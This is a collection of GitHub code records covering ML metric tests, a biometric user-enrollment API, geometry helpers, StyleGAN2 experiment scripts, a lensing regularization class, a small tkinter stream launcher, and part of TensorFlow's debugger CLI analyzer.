test_per_sample_dice(segmentation_coco_train_visiondata, trained_segmentation_deeplabv3_mobilenet_model, device):\n batch = next(iter(segmentation_coco_train_visiondata))\n predictions = segmentation_coco_train_visiondata.infer_on_batch(batch,\n trained_segmentation_deeplabv3_mobilenet_model,\n device)\n labels = batch[1]\n res = per_sample_dice(predictions, labels)\n assert_that(sum(res), close_to(9.513, 0.001))\n","repo_name":"cmendozab/deepchecks","sub_path":"tests/vision/utils_tests/metrics_test.py","file_name":"metrics_test.py","file_ext":"py","file_size_in_byte":6506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"}
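The numbers asserted above are COCO-style average precisions. As a rough illustration of what such a score means, and explicitly not deepchecks' actual implementation, AP can be computed as the mean of the monotone precision envelope sampled at evenly spaced recall thresholds:

import numpy as np

def average_precision(recall, precision, n_points=101):
    """COCO-style AP: mean of the precision envelope at fixed recall points."""
    # make precision non-increasing when scanning from high to low recall
    envelope = np.maximum.accumulate(precision[::-1])[::-1]
    samples = np.interp(np.linspace(0, 1, n_points), recall, envelope, right=0)
    return samples.mean()

r = np.array([0.0, 0.2, 0.4, 0.6, 0.8])   # toy recall values
p = np.array([1.0, 0.9, 0.7, 0.75, 0.5])  # toy precision values
print(round(average_precision(r, p), 3))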
+{"seq_id":"4727400977","text":"from fastapi import APIRouter, Depends, status, HTTPException, UploadFile, File\nfrom fastapi.responses import HTMLResponse\nfrom sqlalchemy.orm import Session\nimport numpy as np\nimport random\nimport time\nimport cv2\nimport os\n\nfrom core.face import FaceRecognition\nfrom core.iris import IrisRecognition\nfrom core.setting import *\nfrom server import database, models\n\nfrom pydantic import BaseModel\nfrom typing import Union\n\n\n# An instance of face-recognition\ninstace_face = FaceRecognition(MODELS, METRICS)\ninstace_iris = IrisRecognition()\n\n# Set router\nrouter = APIRouter(\n tags=['Add New User'],\n prefix=\"/add\"\n)\n\n\n@router.post(\"/\", status_code=status.HTTP_201_CREATED)\nasync def add(\n name_user : str, \n face_file : UploadFile = File(description=\"Upload Face image\"),\n iris_file_1 : UploadFile = File(description=\"Upload Iris 1 image\"),\n iris_file_2 : UploadFile = File(description=\"Upload Iris 2 image\"),\n db: Session = Depends(database.get_db)\n ):\n\n\n\n # Read image contents\n try:\n face_contents = await face_file.read()\n iris_1_contents = await iris_file_1.read()\n iris_2_contents = await iris_file_2.read()\n\n # Make image format in opencv and save temporal image\n name = f'./temporal/{time.time()}_{int(random.random()*1000)}'\n\n nparr = np.fromstring(face_contents, np.uint8)\n face_img = cv2.imdecode(nparr, cv2.IMREAD_COLOR)\n cv2.imwrite(name+'_face.png', face_img)\n\n nparr = np.fromstring(iris_1_contents, np.uint8)\n iris_1_img = cv2.imdecode(nparr, cv2.IMREAD_COLOR)\n cv2.imwrite(name+'_iris_1.png', iris_1_img)\n\n nparr = np.fromstring(iris_2_contents, np.uint8)\n iris_2_img = cv2.imdecode(nparr, cv2.IMREAD_COLOR)\n cv2.imwrite(name+'_iris_2.png', iris_2_img)\n except:\n return {\"detail\" : \"Error in reading data\"}\n\n # Embedding all images\n try:\n face_embed = instace_face.embedding(name+'_face.png')\n iris_1_embed = instace_iris.embedding(name+'_iris_1.png')\n iris_2_embed = instace_iris.embedding(name+'_iris_2.png')\n\n # Remove files\n os.remove(name+'_face.png')\n os.remove(name+'_iris_1.png')\n os.remove(name+'_iris_2.png')\n except:\n return {\"detail\": \"Error in embedding\"}\n\n # Add new User \n try:\n new_user = models.User(name=name_user, face=str(face_embed['Facenet']), iris_1= str(iris_1_embed), iris_2= str(iris_2_embed))\n db.add(new_user)\n db.commit()\n db.refresh(new_user)\n\n return {\"detail\" : f\"Information accepted and pushed to databse with name ({name_user})\"}\n except:\n return {\"detail\" : \"Problem in adding user to database\"}\n \n","repo_name":"mertz1999/Dual-Authentication","sub_path":"server/routers/add.py","file_name":"add.py","file_ext":"py","file_size_in_byte":2730,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"19"}
+{"seq_id":"70520972845","text":"import numpy as np\r\nfrom shapely import LineString\r\nfrom shapely import Point\r\nfrom shapely import line_interpolate_point\r\n\r\n\r\ndef get_unit_vector(a: np.array, b: np.array) -> np.array:\r\n \"\"\"get the unit vector point in the direction point A -> point B\"\"\"\r\n vector = np.subtract(b, a)\r\n unit_v = vector / np.linalg.norm(vector)\r\n if not 0.99 < np.linalg.norm(unit_v) < 1.01:\r\n raise ValueError\r\n return unit_v[0]\r\n\r\n\r\ndef rotate_90_deg(start_point: np.array, end_point: np.array, clockwise: bool) -> np.array:\r\n \"\"\"find the coordinates of the end_point\r\n - rotated 90 degrees around the start point,\r\n - in the given direction (clockwise or counterclockwise)\r\n \"\"\"\r\n vector = np.subtract(end_point, start_point)\r\n\r\n if clockwise:\r\n rot = np.array([[0, 1], [-1, 0]])\r\n return start_point + vector @ rot\r\n else:\r\n rot = np.array([[0, -1], [1, 0]])\r\n return start_point + vector @ rot\r\n\r\n\r\nclass PlineString(LineString):\r\n\r\n def __init__(self, *args, left_clockwise=True, **kwargs):\r\n super().__init__(*args, **kwargs)\r\n # if true, clockwise turn from the first point is left\r\n self.left_clockwise = left_clockwise\r\n\r\n def point_at_distance(self, d: float) -> Point:\r\n \"\"\"interpolate a point at a given distance of the starting point of the linestring\"\"\"\r\n point = line_interpolate_point(self, d)\r\n assert isinstance(Point, point)\r\n return point\r\n\r\n def get_perpendicular_unit_vector(self, d: float, left=True, delta=10):\r\n \"\"\"get a unit vector\r\n - locally perpendicular to the plinestring at +- delta units\r\n - at the point at distance d\r\n - in the given direction (left or right)\r\n \"\"\"\r\n\r\n # create a local segment from d to d+10 m to find the perpendicular to\r\n point = list(self.point_at_distance(d).coords)\r\n end_point = list(self.point_at_distance(d + delta).coords)\r\n\r\n if left:\r\n clockwise = self.left_clockwise\r\n else:\r\n clockwise = not self.left_clockwise\r\n\r\n # find a point in this direction\r\n new_end_point = rotate_90_deg(np.array(point), np.array(end_point), clockwise)\r\n return get_unit_vector(point, new_end_point)\r\n","repo_name":"puijterwaal/shaplien","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"3522348224","text":"### this will be copied to colab\n### everything else imported\nfrom StyleGAN2TTTExperiment import StyleGAN2TTTExperiment\nimport sys\nimport os\n\nimport torch\nimport numpy as np\nimport random\n\ndef run(args):\n e = StyleGAN2TTTExperiment() \n #print(args)\n e.set_args(args)\n e.setup()\n ## SETUP\n #if args.TTT:\n if args.method == 'TNet+TTT' or args.method == 'TTTz':\n e.setup_prenetwork_ttt()\n if args.method == 'TNet+TTT' or args.method == 'TTTw':\n e.setup_prenetwork_w_ttt()\n if args.method == 'TNet+TTT' or args.method == 'TNet':\n e.setup_intranetwork_ttt()\n print('finished setup')\n\n ## TRAIN\n # may need to set train_sample_size\n if args.method == 'TNet+TTT':\n e.train_prenetwork_and_intranetwork_ttt()\n elif args.method == 'TNet':\n e.train_intranetwork_ttt()\n elif args.method == 'TTTz':\n e.train_prenetwork_ttt()\n elif args.method == 'TTTw':\n e.train_prenetwork_w_ttt()\n print('finished train')\n \n for i in range(args.n_eval_samples):\n ##comparison methods\n #if args.method in comparison_methods: #= ['normal','coachz','coachw','ttz','ttw']\n if args.method == 'normal':\n e.sample_n_stylegan_images_without_tt()\n if args.method == 'coachz':\n e.sample_n_stylegan_images_with_coachgan()\n if args.method == 'coachw':\n e.sample_n_stylegan_images_with_w_coachgan()\n if args.method == 'ttz':\n e.sample_n_stylegan_images_with_z_tt()\n if args.method == 'ttw':\n e.sample_n_stylegan_images_with_w_ttl()\n\n ## TTT and TNET \n if args.method == 'TTTz':\n e.sample_n_stylegan_images_with_prenetwork_ttt()\n if args.method == 'TTTw':\n e.sample_n_stylegan_images_with_post_w_prenetwork_ttt()\n if args.method == 'TNet':\n e.sample_n_stylegan_images_with_intranetwork_ttt()\n if args.method == 'TNet+TTT':\n e.sample_n_stylegan_images_with_pre_and_intranetwork_ttt()\n\n e.save_results(num=i*args.batch_size)\n #e.calc_metrics()\n\n#parser = argparse.ArgumentParser()\n#parser.add_argument('--TT', action='store_true', help='use TT for z')\n#parser.add_argument('--TTl', action='store_true', help='use TT-lerp for w')\n#parser.add_argument('--TTT', action='store_true', help='use TTT for z')\n#parser.add_argument('--w_TTT', action='store_true', help='use TTT for w')\n#parser.add_argument('--coach_z', action='store_true', help='use CoachGAN for z')\n#parser.add_argument('--coach_w', action='store_true', help='use CoachGAN for w')\nfrom os.path import join\nimport easydict\nargs = easydict.EasyDict()\n\nargs.repo = './stylegan2'\nsys.path.append(args.repo)\n\nimport dnnlib\nfrom dnnlib import tflib\n\ntflib.init_tf()\n\nimport metrics\n\n#comparison methods\nargs.truncation = 0.7\nargs.lr =0.00001\nargs.niter = 1000\nargs.batch_size = 2\nargs.n_eval_samples = 5000\ndatasets = ['ffhq','cat','horse','church','car']\nargs.dataset = 'church'\nargs.path ='/content/results'\n\nargs.base_exp_name='testing1000_iter_lr_00001'\nargs.size = 1024 if args.dataset == 'ffhq' else 256\nargs.checkpoint = 'stylegan2-%s-config-f.pt' % args.dataset\nargs.channel_multiplier = 2\nargs.latent = 512\nargs.n_mlp = 8\nargs.device = 'cuda'\n\n## TESTING\nmethods = ['TTTz','TTTw','TNet','TNet+TTT']\n#TTTw isn't working right now\n#methods = ['TTTw','TNet','TNet+TTT']\n#methods = ['TNet','TNet+TTT']\n#methods = ['TNet+TTT']\narchitectures = ['prelu','a','b','c','d','e','f']\n#architectures = ['c','d','e','f']\n#architectures = ['d','e','f']\nlayers = [2,4]#,8]#,16]#,32,64,128,256]\nfor m in methods:\n if m in ['TTTz','TTTw']:\n layers = [2,4,8,16,32]\n else:\n layers = [2,4]\n for arch in 
architectures:\n        for nl in layers:\n            args.nlayer = nl\n            args.arch = arch\n            args.method = m\n\n            seed = 0\n            torch.manual_seed(seed)\n            torch.cuda.manual_seed(seed)\n            torch.cuda.manual_seed_all(seed)  # if you are using multi-GPU.\n            np.random.seed(seed)  # Numpy module.\n            random.seed(seed)  # Python random module.\n            torch.manual_seed(seed)\n            torch.backends.cudnn.benchmark = False\n            torch.backends.cudnn.deterministic = True\n            if args.method in ['TTTz','TTTw','TNet','TNet+TTT']:\n                args.savedir = join( args.path, args.base_exp_name, args.method+args.arch+str(args.nlayer))\n            else:\n                args.savedir = join( args.path, args.base_exp_name, args.method)\n            print(args.savedir)\n            if not os.path.exists(args.savedir):\n                os.makedirs(args.savedir)\n            run(args)\n\n#NOTE: All comparison methods work\n# coachz and ttz give different-looking images (as expected)\ncomparison_methods = ['normal','coachz','coachw','ttz','ttw']\nfor method in comparison_methods:\n    print('method:',method)\n    seed = 0\n    torch.manual_seed(seed)\n    torch.cuda.manual_seed(seed)\n    torch.cuda.manual_seed_all(seed)  # if you are using multi-GPU.\n    np.random.seed(seed)  # Numpy module.\n    random.seed(seed)  # Python random module.\n    torch.manual_seed(seed)\n    torch.backends.cudnn.benchmark = False\n    torch.backends.cudnn.deterministic = True\n    args.method = method\n    args.savedir = join( args.path, args.base_exp_name, args.method)\n    if not os.path.exists(args.savedir):\n        os.makedirs(args.savedir)\n    run(args)\n\n\nexit()\n\n## SAMPLE\n#a\\item BPF + x\n#b\\item BPF-BF + x\n#c\\item BPF-BPF$_{bottleneck}$-BF + \n#d\\item FBP + x\n#e\\item FBP-FB + x\n#f\\item FBP-F_${bottleneck}$BP-FB + \n#our methods\n#if args.train ==> train then sample\n","repo_name":"mbbrodie/stylegan2","sub_path":"run_stylegan_ttt_experiments.py","file_name":"run_stylegan_ttt_experiments.py","file_ext":"py","file_size_in_byte":5707,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
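# The experiment loops above repeat the same seeding boilerplate before every
# run; a small helper like this (a sketch, assuming torch and numpy are
# available) keeps the reproducibility recipe in one place.
import random

import numpy as np
import torch

def set_seed(seed: int) -> None:
    """Seed Python, NumPy and PyTorch RNGs for best-effort reproducibility."""
    random.seed(seed)
    np.random.seed(seed)
    torch.manual_seed(seed)
    torch.cuda.manual_seed_all(seed)  # deferred no-op without CUDA; covers multi-GPU
    torch.backends.cudnn.benchmark = False
    torch.backends.cudnn.deterministic = True

set_seed(0)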
+{"seq_id":"11703719704","text":"from __future__ import annotations\r\nimport numpy as np\r\nfrom typing import TYPE_CHECKING\r\n\r\nif TYPE_CHECKING:\r\n from autoarray.inversion.linear_obj.linear_obj import LinearObj\r\n\r\nfrom autoarray.inversion.regularization.abstract import AbstractRegularization\r\n\r\nfrom autoarray.inversion.regularization import regularization_util\r\n\r\n\r\nclass BrightnessZeroth(AbstractRegularization):\r\n def __init__(\r\n self,\r\n coefficient: float = 1.0,\r\n signal_scale: float = 1.0,\r\n ):\r\n \"\"\"\r\n An adaptive regularization scheme which applies zeroth order regularization to pixels with low expected\r\n signal values.\r\n\r\n For the weighted regularization scheme, each pixel is given an 'effective regularization weight', which is\r\n controls the degree of zeroth order regularization applied to each pixel. The motivation of this is that\r\n the exterior regions different regions of a pixelization's mesh ought to have a signal consistent with zero,\r\n but may have a low level of non-zero signal when fitting the data.\r\n\r\n To implement this regularization, values on the diagonal of the regularization matrix are increased\r\n according to the regularization weight_list of each pixel.\r\n\r\n Parameters\r\n ----------\r\n coefficient\r\n The regularization coefficient which controls the degree of zeroth order regularizaiton applied to\r\n the inversion reconstruction, in regions of low signal.\r\n signal_scale\r\n A factor which controls how rapidly the smoothness of regularization varies from high signal regions to\r\n low signal regions.\r\n \"\"\"\r\n\r\n super().__init__()\r\n\r\n self.coefficient = coefficient\r\n self.signal_scale = signal_scale\r\n\r\n def regularization_weights_from(self, linear_obj: LinearObj) -> np.ndarray:\r\n \"\"\"\r\n Returns the regularization weights of the ``BrightnessZeroth`` regularization scheme.\r\n\r\n The weights define the level of zeroth order regularization applied to every mesh parameter (typically pixels\r\n of a ``Mapper``).\r\n\r\n They are computed using an estimate of the expected signal in each pixel.\r\n\r\n Parameters\r\n ----------\r\n linear_obj\r\n The linear object (e.g. a ``Mapper``) which uses these weights when performing regularization.\r\n\r\n Returns\r\n -------\r\n The regularization weights.\r\n \"\"\"\r\n pixel_signals = linear_obj.pixel_signals_from(signal_scale=self.signal_scale)\r\n\r\n return regularization_util.brightness_zeroth_regularization_weights_from(\r\n coefficient=self.coefficient, pixel_signals=pixel_signals\r\n )\r\n\r\n def regularization_matrix_from(self, linear_obj: LinearObj) -> np.ndarray:\r\n \"\"\"\r\n Returns the regularization matrix of this regularization scheme.\r\n\r\n Parameters\r\n ----------\r\n linear_obj\r\n The linear object (e.g. a ``Mapper``) which uses this matrix to perform regularization.\r\n\r\n Returns\r\n -------\r\n The regularization matrix.\r\n \"\"\"\r\n regularization_weights = self.regularization_weights_from(linear_obj=linear_obj)\r\n\r\n return regularization_util.brightness_zeroth_regularization_matrix_from(\r\n regularization_weights=regularization_weights\r\n )\r\n","repo_name":"Jammy2211/PyAutoArray","sub_path":"autoarray/inversion/regularization/brightness_zeroth.py","file_name":"brightness_zeroth.py","file_ext":"py","file_size_in_byte":3391,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"19"}
+{"seq_id":"42212628905","text":"from tkinter import *\nimport webbrowser\n\nroot = Tk()\n\nnew = 1\nurl = \"http://192.168.156.87:8080/\" #Replace with the ip of stream\n\ndef openweb():\n webbrowser.open(url,new=new)\n\nBtn = Button(root, text = \"Stream Cam\",command=openweb)\nBtn.pack()\n\nroot.mainloop()\n","repo_name":"Pritesh-0/rudra_training","sub_path":"guistream.py","file_name":"guistream.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"4001291954","text":"import argparse\nimport copy\nimport re\n\n\nfrom tensorflow.python.debug.cli import cli_config\nfrom tensorflow.python.debug.cli import cli_shared\nfrom tensorflow.python.debug.cli import command_parser\nfrom tensorflow.python.debug.cli import debugger_cli_common\nfrom tensorflow.python.debug.cli import evaluator\nfrom tensorflow.python.debug.cli import ui_factory\nfrom tensorflow.python.debug.lib import debug_graphs\nfrom tensorflow.python.debug.lib import source_utils\n\nRL = debugger_cli_common.RichLine\n\n# String constants for the depth-dependent hanging indent at the beginning\n# of each line.\nHANG_UNFINISHED = \"| \" # Used for unfinished recursion depths.\nHANG_FINISHED = \" \"\nHANG_SUFFIX = \"|- \"\n\n# String constant for displaying depth and op type.\nDEPTH_TEMPLATE = \"(%d) \"\nOP_TYPE_TEMPLATE = \"[%s] \"\n\n# String constants for control inputs/outputs, etc.\nCTRL_LABEL = \"(Ctrl) \"\nELLIPSIS = \"...\"\n\nSORT_TENSORS_BY_TIMESTAMP = \"timestamp\"\nSORT_TENSORS_BY_DUMP_SIZE = \"dump_size\"\nSORT_TENSORS_BY_OP_TYPE = \"op_type\"\nSORT_TENSORS_BY_TENSOR_NAME = \"tensor_name\"\n\n\ndef _add_main_menu(output,\n node_name=None,\n enable_list_tensors=True,\n enable_node_info=True,\n enable_print_tensor=True,\n enable_list_inputs=True,\n enable_list_outputs=True):\n \"\"\"Generate main menu for the screen output from a command.\n\n Args:\n output: (debugger_cli_common.RichTextLines) the output object to modify.\n node_name: (str or None) name of the node involved (if any). If None,\n the menu items node_info, list_inputs and list_outputs will be\n automatically disabled, overriding the values of arguments\n enable_node_info, enable_list_inputs and enable_list_outputs.\n enable_list_tensors: (bool) whether the list_tensor menu item will be\n enabled.\n enable_node_info: (bool) whether the node_info item will be enabled.\n enable_print_tensor: (bool) whether the print_tensor item will be enabled.\n enable_list_inputs: (bool) whether the item list_inputs will be enabled.\n enable_list_outputs: (bool) whether the item list_outputs will be enabled.\n \"\"\"\n\n menu = debugger_cli_common.Menu()\n\n menu.append(\n debugger_cli_common.MenuItem(\n \"list_tensors\", \"list_tensors\", enabled=enable_list_tensors))\n\n if node_name:\n menu.append(\n debugger_cli_common.MenuItem(\n \"node_info\",\n \"node_info -a -d -t %s\" % node_name,\n enabled=enable_node_info))\n menu.append(\n debugger_cli_common.MenuItem(\n \"print_tensor\",\n \"print_tensor %s\" % node_name,\n enabled=enable_print_tensor))\n menu.append(\n debugger_cli_common.MenuItem(\n \"list_inputs\",\n \"list_inputs -c -r %s\" % node_name,\n enabled=enable_list_inputs))\n menu.append(\n debugger_cli_common.MenuItem(\n \"list_outputs\",\n \"list_outputs -c -r %s\" % node_name,\n enabled=enable_list_outputs))\n else:\n menu.append(\n debugger_cli_common.MenuItem(\n \"node_info\", None, enabled=False))\n menu.append(\n debugger_cli_common.MenuItem(\"print_tensor\", None, enabled=False))\n menu.append(\n debugger_cli_common.MenuItem(\"list_inputs\", None, enabled=False))\n menu.append(\n debugger_cli_common.MenuItem(\"list_outputs\", None, enabled=False))\n\n menu.append(\n debugger_cli_common.MenuItem(\"run_info\", \"run_info\"))\n menu.append(\n debugger_cli_common.MenuItem(\"help\", \"help\"))\n\n output.annotations[debugger_cli_common.MAIN_MENU_KEY] = menu\n\n\nclass DebugAnalyzer(object):\n \"\"\"Analyzer for debug data from dump directories.\"\"\"\n\n _TIMESTAMP_COLUMN_HEAD = \"t (ms)\"\n 
_DUMP_SIZE_COLUMN_HEAD = \"Size (B)\"\n  _OP_TYPE_COLUMN_HEAD = \"Op type\"\n  _TENSOR_NAME_COLUMN_HEAD = \"Tensor name\"\n\n  # Op types to be omitted when generating descriptions of graph structure.\n  _GRAPH_STRUCT_OP_TYPE_DENYLIST = (\"_Send\", \"_Recv\", \"_HostSend\", \"_HostRecv\",\n                                    \"_Retval\")\n\n  def __init__(self, debug_dump, config):\n    \"\"\"DebugAnalyzer constructor.\n\n    Args:\n      debug_dump: A DebugDumpDir object.\n      config: A `cli_config.CLIConfig` object that carries user-facing\n        configurations.\n    \"\"\"\n\n    self._debug_dump = debug_dump\n    self._evaluator = evaluator.ExpressionEvaluator(self._debug_dump)\n\n    # Initialize tensor filters state.\n    self._tensor_filters = {}\n\n    self._build_argument_parsers(config)\n    config.set_callback(\"graph_recursion_depth\",\n                        self._build_argument_parsers)\n\n    # TODO(cais): Implement list_nodes.\n\n  def _build_argument_parsers(self, config):\n    \"\"\"Build argument parsers for DebugAnalyzer.\n\n    The parsers are stored in `self._arg_parsers`, a dict mapping command\n    handler name to `ArgumentParser` instance.\n\n    Args:\n      config: A `cli_config.CLIConfig` object.\n    \"\"\"\n    # Argument parsers for command handlers.\n    self._arg_parsers = {}\n\n    # Parser for list_tensors.\n    ap = argparse.ArgumentParser(\n        description=\"List dumped intermediate tensors.\",\n        usage=argparse.SUPPRESS)\n    ap.add_argument(\n        \"-f\",\n        \"--tensor_filter\",\n        dest=\"tensor_filter\",\n        type=str,\n        default=\"\",\n        help=\"List only Tensors passing the filter of the specified name\")\n    ap.add_argument(\n        \"-fenn\",\n        \"--filter_exclude_node_names\",\n        dest=\"filter_exclude_node_names\",\n        type=str,\n        default=\"\",\n        help=\"When applying the tensor filter, exclude nodes with names \"\n        \"matching the regular expression. Applicable only if --tensor_filter \"\n        \"or -f is used.\")\n    ap.add_argument(\n        \"-n\",\n        \"--node_name_filter\",\n        dest=\"node_name_filter\",\n        type=str,\n        default=\"\",\n        help=\"filter node name by regex.\")\n    ap.add_argument(\n        \"-t\",\n        \"--op_type_filter\",\n        dest=\"op_type_filter\",\n        type=str,\n        default=\"\",\n        help=\"filter op type by regex.\")\n    ap.add_argument(\n        \"-s\",\n        \"--sort_by\",\n        dest=\"sort_by\",\n        type=str,\n        default=SORT_TENSORS_BY_TIMESTAMP,\n        help=(\"the field to sort the data by: (%s | %s | %s | %s)\" %\n              (SORT_TENSORS_BY_TIMESTAMP, SORT_TENSORS_BY_DUMP_SIZE,\n               SORT_TENSORS_BY_OP_TYPE, SORT_TENSORS_BY_TENSOR_NAME)))\n    ap.add_argument(\n        \"-r\",\n        \"--reverse\",\n        dest=\"reverse\",\n        action=\"store_true\",\n        help=\"sort the data in reverse (descending) order\")\n    self._arg_parsers[\"list_tensors\"] = ap\n\n    # Parser for node_info.\n    ap = argparse.ArgumentParser(\n        description=\"Show information about a node.\", usage=argparse.SUPPRESS)\n    ap.add_argument(\n        \"node_name\",\n        type=str,\n        help=\"Name of the node or an associated tensor, e.g., \"\n        \"hidden1/Wx_plus_b/MatMul, hidden1/Wx_plus_b/MatMul:0\")\n    ap.add_argument(\n        \"-a\",\n        \"--attributes\",\n        dest=\"attributes\",\n        action=\"store_true\",\n        help=\"Also list attributes of the node.\")\n    ap.add_argument(\n        \"-d\",\n        \"--dumps\",\n        dest=\"dumps\",\n        action=\"store_true\",\n        help=\"Also list dumps available from the node.\")\n    ap.add_argument(\n        \"-t\",\n        \"--traceback\",\n        dest=\"traceback\",\n        action=\"store_true\",\n        help=\"Also include the traceback of the node's creation \"\n        \"(if available in Python).\")\n    self._arg_parsers[\"node_info\"] = ap\n\n    # Parser for list_inputs.\n    ap = argparse.ArgumentParser(\n        description=\"Show inputs to a node.\", usage=argparse.SUPPRESS)\n    ap.add_argument(\n        \"node_name\",\n 
type=str,\n help=\"Name of the node or an output tensor from the node, e.g., \"\n \"hidden1/Wx_plus_b/MatMul, hidden1/Wx_plus_b/MatMul:0\")\n ap.add_argument(\n \"-c\", \"--control\", action=\"store_true\", help=\"Include control inputs.\")\n ap.add_argument(\n \"-d\",\n \"--depth\",\n dest=\"depth\",\n type=int,\n default=config.get(\"graph_recursion_depth\"),\n help=\"Maximum depth of recursion used when showing the input tree.\")\n ap.add_argument(\n \"-r\",\n \"--recursive\",\n dest=\"recursive\",\n action=\"store_true\",\n help=\"Show inputs to the node recursively, i.e., the input tree.\")\n ap.add_argument(\n \"-t\",\n \"--op_type\",\n action=\"store_true\",\n help=\"Show op types of input nodes.\")\n self._arg_parsers[\"list_inputs\"] = ap\n\n # Parser for list_outputs.\n ap = argparse.ArgumentParser(\n description=\"Show the nodes that receive the outputs of given node.\",\n usage=argparse.SUPPRESS)\n ap.add_argument(\n \"node_name\",\n type=str,\n help=\"Name of the node or an output tensor from the node, e.g., \"\n \"hidden1/Wx_plus_b/MatMul, hidden1/Wx_plus_b/MatMul:0\")\n ap.add_argument(\n \"-c\", \"--control\", action=\"store_true\", help=\"Include control inputs.\")\n ap.add_argument(\n \"-d\",\n \"--depth\",\n dest=\"depth\",\n type=int,\n default=config.get(\"graph_recursion_depth\"),\n help=\"Maximum depth of recursion used when showing the output tree.\")\n ap.add_argument(\n \"-r\",\n \"--recursive\",\n dest=\"recursive\",\n action=\"store_true\",\n help=\"Show recipients of the node recursively, i.e., the output \"\n \"tree.\")\n ap.add_argument(\n \"-t\",\n \"--op_type\",\n action=\"store_true\",\n help=\"Show op types of recipient nodes.\")\n self._arg_parsers[\"list_outputs\"] = ap\n\n # Parser for print_tensor.\n self._arg_parsers[\"print_tensor\"] = (\n command_parser.get_print_tensor_argparser(\n \"Print the value of a dumped tensor.\"))\n\n # Parser for print_source.\n ap = argparse.ArgumentParser(\n description=\"Print a Python source file with overlaid debug \"\n \"information, including the nodes (ops) or Tensors created at the \"\n \"source lines.\",\n usage=argparse.SUPPRESS)\n ap.add_argument(\n \"source_file_path\",\n type=str,\n help=\"Path to the source file.\")\n ap.add_argument(\n \"-t\",\n \"--tensors\",\n dest=\"tensors\",\n action=\"store_true\",\n help=\"Label lines with dumped Tensors, instead of ops.\")\n ap.add_argument(\n \"-m\",\n \"--max_elements_per_line\",\n type=int,\n default=10,\n help=\"Maximum number of elements (ops or Tensors) to show per source \"\n \"line.\")\n ap.add_argument(\n \"-b\",\n \"--line_begin\",\n type=int,\n default=1,\n help=\"Print source beginning at line number (1-based.)\")\n self._arg_parsers[\"print_source\"] = ap\n\n # Parser for list_source.\n ap = argparse.ArgumentParser(\n description=\"List source files responsible for constructing nodes and \"\n \"tensors present in the run().\",\n usage=argparse.SUPPRESS)\n ap.add_argument(\n \"-p\",\n \"--path_filter\",\n type=str,\n default=\"\",\n help=\"Regular expression filter for file path.\")\n ap.add_argument(\n \"-n\",\n \"--node_name_filter\",\n type=str,\n default=\"\",\n help=\"Regular expression filter for node name.\")\n self._arg_parsers[\"list_source\"] = ap\n\n # Parser for eval.\n ap = argparse.ArgumentParser(\n description=\"\"\"Evaluate an arbitrary expression. Can use tensor values\n from the current debug dump. The debug tensor names should be enclosed\n in pairs of backticks. 
Expressions with spaces should be enclosed in\n a pair of double quotes or a pair of single quotes. By default, numpy\n is imported as np and can be used in the expressions. E.g.,\n 1) eval np.argmax(`Softmax:0`),\n 2) eval 'np.sum(`Softmax:0`, axis=1)',\n 3) eval \"np.matmul((`output/Identity:0`/`Softmax:0`).T, `Softmax:0`)\".\n \"\"\",\n usage=argparse.SUPPRESS)\n ap.add_argument(\n \"expression\",\n type=str,\n help=\"\"\"Expression to be evaluated.\n 1) in the simplest case, use :, e.g.,\n hidden_0/MatMul:0.\n\n 2) if the default debug op \"DebugIdentity\" is to be overridden, use\n ::, e.g.,\n hidden_0/MatMul:0:DebugNumericSummary.\n\n 3) if the tensor of the same name exists on more than one device, use\n ::[:], e.g.,\n /job:worker/replica:0/task:0/gpu:0:hidden_0/MatMul:0\n /job:worker/replica:0/task:2/cpu:0:hidden_0/MatMul:0:DebugNanCount.\n\n 4) if the tensor is executed multiple times in a given `Session.run`\n call, specify the execution index with a 0-based integer enclose in a\n pair of brackets at the end, e.g.,\n RNN/tanh:0[0]\n /job:worker/replica:0/task:0/gpu:0:RNN/tanh:0[0].\"\"\")\n ap.add_argument(\n \"-a\",\n \"--all\",\n dest=\"print_all\",\n action=\"store_true\",\n help=\"Print the tensor in its entirety, i.e., do not use ellipses \"\n \"(may be slow for large results).\")\n ap.add_argument(\n \"-w\",\n \"--write_path\",\n default=\"\",\n help=\"Path of the numpy file to write the evaluation result to, \"\n \"using numpy.save()\")\n self._arg_parsers[\"eval\"] = ap\n\n def add_tensor_filter(self, filter_name, filter_callable):\n \"\"\"Add a tensor filter.\n\n A tensor filter is a named callable of the signature:\n filter_callable(dump_datum, tensor),\n\n wherein dump_datum is an instance of debug_data.DebugTensorDatum carrying\n metadata about the dumped tensor, including tensor name, timestamps, etc.\n tensor is the value of the dumped tensor as an numpy.ndarray object.\n The return value of the function is a bool.\n This is the same signature as the input argument to\n debug_data.DebugDumpDir.find().\n\n Args:\n filter_name: (str) name of the filter. 
Cannot be empty.\n filter_callable: (callable) a filter function of the signature described\n as above.\n\n Raises:\n ValueError: If filter_name is an empty str.\n TypeError: If filter_name is not a str.\n Or if filter_callable is not callable.\n \"\"\"\n\n if not isinstance(filter_name, str):\n raise TypeError(\"Input argument filter_name is expected to be str, \"\n \"but is not.\")\n\n # Check that filter_name is not an empty str.\n if not filter_name:\n raise ValueError(\"Input argument filter_name cannot be empty.\")\n\n # Check that filter_callable is callable.\n if not callable(filter_callable):\n raise TypeError(\n \"Input argument filter_callable is expected to be callable, \"\n \"but is not.\")\n\n self._tensor_filters[filter_name] = filter_callable\n\n def get_tensor_filter(self, filter_name):\n \"\"\"Retrieve filter function by name.\n\n Args:\n filter_name: Name of the filter set during add_tensor_filter() call.\n\n Returns:\n The callable associated with the filter name.\n\n Raises:\n ValueError: If there is no tensor filter of the specified filter name.\n \"\"\"\n\n if filter_name not in self._tensor_filters:\n raise ValueError(\"There is no tensor filter named \\\"%s\\\"\" % filter_name)\n\n return self._tensor_filters[filter_name]\n\n def get_help(self, handler_name):\n return self._arg_parsers[handler_name].format_help()\n\n def list_tensors(self, args, screen_info=None):\n \"\"\"Command handler for list_tensors.\n\n List tensors dumped during debugged Session.run() call.\n\n Args:\n args: Command-line arguments, excluding the command prefix, as a list of\n str.\n screen_info: Optional dict input containing screen information such as\n cols.\n\n Returns:\n Output text lines 